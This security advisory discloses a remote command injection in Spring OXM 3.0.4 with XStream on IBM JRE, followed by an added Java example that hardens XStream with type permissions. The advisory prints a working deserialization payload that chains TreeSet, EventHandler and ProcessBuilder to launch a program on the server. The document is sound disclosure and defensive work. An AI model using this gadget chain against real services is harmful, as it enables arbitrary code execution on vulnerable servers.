Spring Source OXM when XStream and IBM JRE are used suffers from a remote OS command injection vulnerability. The author wants Packet Storm to note publicly that he did not submit this to the site but only to Bugtraq, where Packet Storm picked it up in the public domain.
Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics
CVSS: 7.6
AccessVector: Network
AccessComplexity: High
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Details:
Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.
This is an example of legitimate input:
<bicycle>
  <name>unicycle</name>
  <id>123</id>
  <nbrWheels>1</nbrWheels>
  <nbrRiders>1</nbrRiders>
</bicycle>
This malicious input will instead execute the notepad application on the server and open the C:\Windows\win.ini file. The class attribute on the root element overrides the expected Bicycle type with java.util.TreeSet, and the nested handler reaches java.lang.ProcessBuilder:
<bicycle class="java.util.TreeSet">
  <no-comparator />
  <object />
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string>notepad.exe</string>
          <string>c:\windows\win.ini</string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</bicycle>
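The root cause is that an unrestricted XStream instance instantiates whatever type the class attribute names. As an added example (not code from the advisory, SpringSource or XStream), the Java program below configures XStream's type-permission framework, which exists from XStream 1.4.7 onward and is therefore newer than the 3.0.4 release the advisory concerns, so that only Bicycle and its field types can be unmarshalled; the Bicycle class and both sample documents are constructed to match the advisory's input.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class SafeBicycleUnmarshaller {

    // Constructed to match the element layout of the advisory's legitimate input.
    public static class Bicycle {
        String name;
        int id;
        int nbrWheels;
        int nbrRiders;
    }

    // Hardened XStream: no type is deserializable unless explicitly allowed here,
    // so a class attribute naming TreeSet, EventHandler or ProcessBuilder is refused
    // before any object is constructed.
    public static XStream hardenedXStream() {
        XStream xs = new XStream();
        xs.addPermission(NoTypePermission.NONE);              // deny everything first
        xs.addPermission(NullPermission.NULL);                // then re-allow null values
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES); // int and its wrapper
        xs.allowTypes(new Class[] { Bicycle.class, String.class });
        xs.alias("bicycle", Bicycle.class);
        return xs;
    }

    public static void main(String[] args) {
        XStream xs = hardenedXStream();

        // Constructed sample: the advisory's legitimate input, which still unmarshals.
        String good = "<bicycle><name>unicycle</name><id>123</id>"
                    + "<nbrWheels>1</nbrWheels><nbrRiders>1</nbrRiders></bicycle>";
        Bicycle b = (Bicycle) xs.fromXML(good);
        System.out.println("unmarshalled " + b.name + " with " + b.nbrWheels + " wheel(s)");

        // Constructed sample: a class attribute that tries to swap in another type,
        // the first step of the advisory's payload. It is rejected at type resolution.
        String hostile = "<bicycle class=\"java.util.TreeSet\"/>";
        try {
            xs.fromXML(hostile);
            System.out.println("UNEXPECTED: type override was accepted");
        } catch (ForbiddenClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A ForbiddenClassException reaching the application is also a useful detection signal: log it with the remote peer, since legitimate clients never send a class attribute for this schema.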